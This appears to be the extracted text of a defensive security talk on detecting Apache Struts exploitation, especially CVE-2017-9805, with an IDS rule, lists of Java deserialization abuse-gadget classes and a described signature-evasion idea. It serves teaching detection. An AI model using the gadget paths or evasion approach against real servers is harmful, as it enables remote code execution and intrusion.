Death by a Thousand Struts A Defenders Tale Justin Warner (@sixdub) - - PowerPoint PPT Presentation

Death by a Thousand Struts

A Defenders Tale

Justin Warner (@sixdub)

$Whoami - Justin Warner (@sixdub)

• Principal Security Engineer @ ICEBRG

focusing on detection, network data analysis, and adversary emulation testing

• Computer Science grad from USAF Academy &

former military computer nerd

• Former red team lead who worked w/ multi-

national Fortune 100 enterprises

• BlackHat USA Instructor in 2015 & 2016 for

Adaptive Red Team Tactics

2

Red -> Blue

My career has been a pretty constant flip flop of roles. I feel as though it has strengthened me technically and professionally. Job #1: Network Analyst, US Air Force Job #2: Red Team Lead, Adaptive Thread Division (ATD) Job #3: Principal Security Engineer, ICEBRG Understanding the ins and outs of operations of your opponent makes you a better prepared opponent.

Let’s Tell A Story

This Thing Called Struts

“Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON.”

https://struts.apache.org/

Apache Struts is a prevalent framework often exposed on internet connected devices. Due to its large sophisticated capability set, it includes a number of external dependencies and legacy code bases.

Is Struts Common?

Internet connected Apache devices are everywhere (17 million on Shodan). Struts is also everywhere: “65 percent of the Fortune 100 companies are actively using web applications built with the Struts

• framework. This includes organizations like Lockheed

Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and Showtime.” Additionally, based on experience, internal applications are often built on struts making a juicy target during post-exploitation.

https://thenewstack.io/critical-vulnerability-apache-struts-puts- thousands-web-applications-risk/ via Shodan.io

Are People Still Targeting Struts?

https://greynoise.io/ Many thanks to Andrew Morris for giving me data! Takeaways:

• VPS Providers are common

scanning source

• People are still looking for struts

servers

• This is only for external facing

looking for default paths from exploit POC

Lots of CVEs

CV CVE-20 2017-56 5638: “The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.”

https://nvd.nist.gov/vuln/detail/CVE-2017-5638

CV CVE-20 2017-97 9791 91: “The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.”

https://nvd.nist.gov/vuln/detail/CVE-2017-9791

CV CVE-20 2017-98 9805: “The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.”

https://nvd.nist.gov/vuln/detail/CVE-2017-9805

Lots of Struts IR in 2017

In 2017, I saw many engagements that began with struts exploitation. Throughout these cases, Struts exploitation led to:

• Continuous and automated compromise for criminal purposes
• Enterprise wide ransomware deployments
• Targeted attacks by threat groups with focused objectives

Even after signatures were released and people knew what to look for and how to fix, we continued to witness devastating in-the-wild compromise. But why?!

Real World Conversation

Common Themes:

• Did not know the asset was exposed (lacked visibility).

Often a Legacy asset w/ no endpoint protection.

• Trusted their security stack and provided detections
• Did not have any practice performing response and

remediation on the public facing asset. Takeaways:

• Visibility is a key first step.
• The state of detection within organizations is still

maturing.

• Offensive testing and exercises could have helped

these particular customers.

Thank you Kaya (my daughter) for showing how I feel here

What We Will Discuss - Goals

Blue teams must better understand the applied detection logic in their

• environments. Detection authors must strive to better understand root

cause/adversary behavior to author robust indicators and analytics. Red teams should focus their actions to be threat representative to further a training objective. This might include noisy actions. This might get you caught or it might identify detection gap. Let’s use Apache Struts as a case study.

Analysis of POC Exploit & Detection

Time For Fun

One public signature for CVE-2017-9805

Is This Signature / Rule Effective?

alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder?)"; flow:to_server,established; content:"java.lang.ProcessBuilder"; nocase; http_client_body; fast_pattern; content:"<command"; nocase; distance:0; http_client_body; pcre:"/^[\s>]/RPs"; metadata: former_category EXPLOIT; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted- user; sid:2024663; rev:1; metadata:affected_product Apache_Struts2, attack_target Web_Server, deployment Perimeter, signature_severity Critical, created_at 2017_09_06, performance_impact Low, updated_at 2017_09_06;)

Wh Where did the re red co conten ent m match ch co come f e from?

Abuse Gadget From MSF

Is this the only abuse gadget that can be used?

Public Signatures

SI SID Ru Rule le M Messag age

2024663 ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder) 2024664 ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (Runtime.Exec) 2024668 ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 1 2024669 ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 2 2024670 ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 3 2024671 ET EXPLOIT Apache Struts 2 REST Plugin (B64) 4 2024672 ET EXPLOIT Apache Struts 2 REST Plugin (B64) 5 2024673 ET EXPLOIT Apache Struts 2 REST Plugin (B64) 6 2024674 ET EXPLOIT Apache Struts 2 REST Plugin (Runtime.Exec) 2024675 ET EXPLOIT Apache Struts 2 REST Plugin (ProcessBuilder)

https://rules.emergingthreats.net/

Public Signature Analysis

Black = Targeting very specific abuse gadgets Green = Targeting “ysoserial” Base64 Blob Red = Hardcoded URI of App

SI SID Ru Rule le M Messag age 2024663 ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder) 2024664 ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (Runtime.Exec) 2024668 ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 1 2024669 ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 2 2024670 ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 3 2024671 ET EXPLOIT Apache Struts 2 REST Plugin (B64) 4 2024672 ET EXPLOIT Apache Struts 2 REST Plugin (B64) 5 2024673 ET EXPLOIT Apache Struts 2 REST Plugin (B64) 6 2024674 ET EXPLOIT Apache Struts 2 REST Plugin (Runtime.Exec) 2024675 ET EXPLOIT Apache Struts 2 REST Plugin (ProcessBuilder) https://rules.emergingthreats.net/

Swapping Abuse Gadgets For Fun & Profit

Time For Fun

Too Easy!

This evasion took less than an hour of development and testing.

• https://github.com/mbechler/m

arshalsec

Just in case you didn’t assume this… bad guys know how to do this research too.

*Credit to Casey Smith and Matt Graeber

Re Requirement

Go Goal

Slide credit: Casey Smith and Matt Graeber https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20D ecks/MattGraeber.CaseySmith.pdf

Back To Basics Of Detection

Getting In a Habit

Identify TTP Intel & Behavior Analysis Loose / Strict Criteria Indicator Creation Durability Testing Indicator Deployed Indicator Maintenance

A rough process that can be used to work through authoring an indicator. Let’s further dive in on the light blue ones…

Defining Loose & Strict Criteria

St Stric ict Crit iteria ia Components of a particular attack chain that are required to be present for the chain to exist. Lo Loose Criteria Components of a particular attack chain that will commonly be present in the attack chain. Generally, at least one of these will be

• present. Also includes attacker behavior

choices.

Strict Criteria 1 Strict Criteria 2 AND Loose Criteria 1 Loose Criteria 2 Loose Criteria 3 OR OR

Behind The Scenes

https://securingtomorrow.mcafee.com/mcafee-labs/apache-struts-at-rest- analyzing-remote-code-execution-vulnerability-cve-2017-9805/

Attacker

Unpack XML Nodes into Reflection Provider doUnmarshal Searches For Class Where Node Names Defined Unmarshal XML Object and Populate Map Object Updates Field with Value From Nodes New Structure Returned to “Object” Abuse Gadget Executed Upon (K,V) Access

Abuse Gadgets:

• System command execution
• JNDI
• Remote classloading (plain)
• Remote classloading

(serviceloader)

• Local classloading

*image from McAffee Labs

Criteria for Network Detection of CVE-2017-9805

St Stric ict

• Exploit payload is XML
• POST requests with

‘application/xml’ data

Loos Loose

• HTTP or SSL/TLS
• Abuse Gadget Paths
• JNDI:
• rg.springframework.jndi.support.SimpleJndiBeanFactory
• com.sun.rowset.JdbcRowSetImpl
• com.sun.jndi.ldap.LdapAttribute
• Remote classloading(plain):
• javax.naming.Reference
• com.sun.jndi.rmi.registry.ReferenceWrapper
• Remote classloading(serviceloader):
• javax.script.ScriptEngineFactory
• System command execution:
• java.lang.ProcessBuilder
• java.lang.Runtime.exec
• Local classloading:
• com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

Indicator Creation

Process by which we author rules/signatures/analytics to detect a clearly identified TTP.

• Leverage all of the systems at your disposal.
• There are usually many ways to detect something. Consider

this a one-to-many phase.

• Indicator / Detection overlap is a good thing if you can

properly visualize and use the alerts.

• Helps a TON if you can explore data in the same “language”

as to which you author indicators

• Helps a TON if you can perform retro-active search

TTP TTP TTP TTP TTP TTP

IDS Signature FTW

For the purposes of this demonstration, we can construct a basic network IDS signature for this activity leveraging the criteria. Left as “exercise for audience”.

• Consider ports/protocols
• Include strict criteria
• Boolean “or” on the loose criteria
• Optimize rule for performance

Many thanks to Dan Caseldan and Chenming Xu aka Sparrow for the example!

https://suricata-ids.org/

More Demo

Getting Creative With Detection

Changing Old View of “Blinky Boxes”

What if we decide to treat traditional alerts from systems as “just another event” that we look at holistically…

• Less concern of FPs
• Ability to author “hunt” style

signatures on various systems

• Post process, enrich, and perform

detection later

• Combine alert streams, network

metadata, application logs, and endpoint data for total win.

https://memegenerator.net/instance/61315184/disaster-girl- intrusion-detection

The Modern Approach

Think of a traditional “sensing” system like the human bodies nervous system….

Nerves Brain

Ev Event t Str Streams ms From From Se Sensors Da Data Pr Processing

PA PAYM YMENT NT SYS YSTEMS

Ana Analy lytic ics an and Det Detec ection

Senses

Behavioral Detection

Rather than look for specific *known* attacks, look for abstract patterns or behaviors of threat actors.

• Move away from reactionary IOC based

approach.

• Can be FP prone depending on approach.

Can you handle the triage?

• Challenging at scale. Are you tall enough to

ride the ride?

Better when you retain forensic event level detail for transparency.

Atomic Indicators Singular Event Based Indicators Behavioral Indicators

Example w/ FIN7: Atomic Indicator: 204.155.31[.]167 Singular Event: DNS TXT to KingServers ASN Behavioral: “Abnormal DNS Ratio” event to low prevalence server

Dream Dream Bigger gger On The Struts Scenario

Imagine generating events for things like:

• A non-browser (JA3 fingerprint) connects to SSL/TLS webserver
• An internet asset classified as a “server” connects to my server
• External access to a resources with little prevalence in dataset (novelty

detection)

• A POST is followed by a connection out to an external IP (or the requestor IP)

within a time threshold

• A POST is followed by an process start event with processes inside a certain

“category”

Take these observations and perform time series analysis, clustering, correlation, etc. Will these survive in your environments? ¯\_()_/¯

Where Does The Red Team Fit?

Let’s Conduct a Self Survey

1. Are you exercising your client’s detection & response capabilities to the fullest extent ac across the ad adversar aries kill chai ain? 2. Are you ensuring your client can effectively identify adversary behaviors in addition to tool artifacts? 3. Are you exercising your blue team’s processes AFTER detection to include investigation, remediation and eviction? 4. Are you working with your client after engagements to close the detection gap and reduce dwell time?

Self-Reflection

Re Red te team am th thoughts: ts:

• Emulate adversarial TTPs
• Exercise processes/people/systems
• Focus on detection, response, eviction

and remediation.

• Allow for “practice” in live environment.

Th These make me sad:

• “I always have to be advanced.”
• “I take whatever path gets me to my
• bjective.”
• “It’s not my job to know defense.”
• “I cant share my TTPs with blue team,

then I wont be able to stay ahead.” Many different views on these topic. Definitions aside, the real thing that matters is the ”customer” get value.

Offense Could Have Helped

Here’s how it could have helped:

• Vu

Vulner erability scanning would have identified the exposed vulnerable assets.

• Pe

Penetration

• n testing would have demonstrated the risk of that asset being

exposed and what an attack chain might look like.

• Re

Red te team aming would have allowed blue team to exercise a full incident response process on this asset to include remediation and get feedback from adversary.

• Ato

Atomi mic D Detec etecti tion T Tes esti ting would have validated the organization had the visibility it needed to detect the TTPs When I was a red teamer, I never used exploits because they “get you caught”... Looking back, I question that mindset…

Atomic Detection Testing

Atomic detection testing is the measured and structured unit testing of detection capabilities in a live environment. Detection is a class of engineering and engineers test their products.

• Controlled and isolated process
• Atomic testing by itself is NOT red teaming (in my opinion)
• Red teamers as threat experts can be VERY helpful in this process or perform the testing

themselves

https://github.com/u ber-common/metta https://github.com/mitre/caldera https://github.com/redcan aryco/atomic-red-team https://github.com/en dgameinc/RTA

Wrap Up

Parting Thought

We (red and blue) are all in this together. "Sometimes when you win, you really lose, & sometimes when you lose, you really win, & sometimes when you win or lose, you actually tie, & sometimes when you tie, you actually win or lose. Winning or losing is all one organic mechanism, from which one extracts what one needs.”

• Rosie Perez

Thank you Questions?